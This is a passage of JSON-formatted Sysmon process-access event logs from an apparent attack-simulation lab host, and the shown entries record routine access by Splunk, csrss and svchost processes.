AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-0010D7720900}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-0010D7720900}","TargetProcessId":"2896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-0010D7720900}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-0010D7720900}","TargetProcessId":"2896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
